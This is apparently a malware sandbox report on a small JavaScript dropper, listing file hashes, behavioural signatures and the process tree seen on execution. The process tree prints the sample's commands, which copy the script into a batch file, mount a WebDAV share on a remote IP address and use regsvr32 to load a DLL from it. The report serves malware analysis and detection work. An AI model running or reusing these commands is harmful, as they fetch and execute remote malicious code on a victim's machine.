Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
95s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 07:09
Static task
static1
Behavioral task
behavioral1
Sample
2727240823238218669.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2727240823238218669.js
Resource
win10v2004-20240704-en
General
-
Target
2727240823238218669.js
-
Size
5KB
-
MD5
f95dec38745edcbb9c3d22555d77c94a
-
SHA1
0934c767e1907110c81aa0fac8d809a967d4f4e7
-
SHA256
6547ae56e683d062433e3083d802a4504fb9e592894a6e2d75e4e4947a4efdd8
-
SHA512
eb825306f2b43feb22cd19f6f19bf4f306d705ac71870e2369173e607f64563f9573f16de756e817587e97092948982364f9cfcf3046fc0891ad49141281cabd
-
SSDEEP
96:xb/BBwzXIxcccQgZXIxcccRl9OYlvN7SKWN1Ft2B3+us2Eeep2B1ikV:pjwZP9vWl8B33xEPAB1ikV
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1208 wrote to memory of 1764 1208 wscript.exe 82 PID 1208 wrote to memory of 1764 1208 wscript.exe 82 PID 1764 wrote to memory of 1904 1764 cmd.exe 85 PID 1764 wrote to memory of 1904 1764 cmd.exe 85 PID 1764 wrote to memory of 1480 1764 cmd.exe 86 PID 1764 wrote to memory of 1480 1764 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2727240823238218669.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2727240823238218669.js" "C:\Users\Admin\\flaldb.bat" && "C:\Users\Admin\\flaldb.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:1904
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\303.dll3⤵PID:1480
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5f95dec38745edcbb9c3d22555d77c94a
SHA10934c767e1907110c81aa0fac8d809a967d4f4e7
SHA2566547ae56e683d062433e3083d802a4504fb9e592894a6e2d75e4e4947a4efdd8
SHA512eb825306f2b43feb22cd19f6f19bf4f306d705ac71870e2369173e607f64563f9573f16de756e817587e97092948982364f9cfcf3046fc0891ad49141281cabd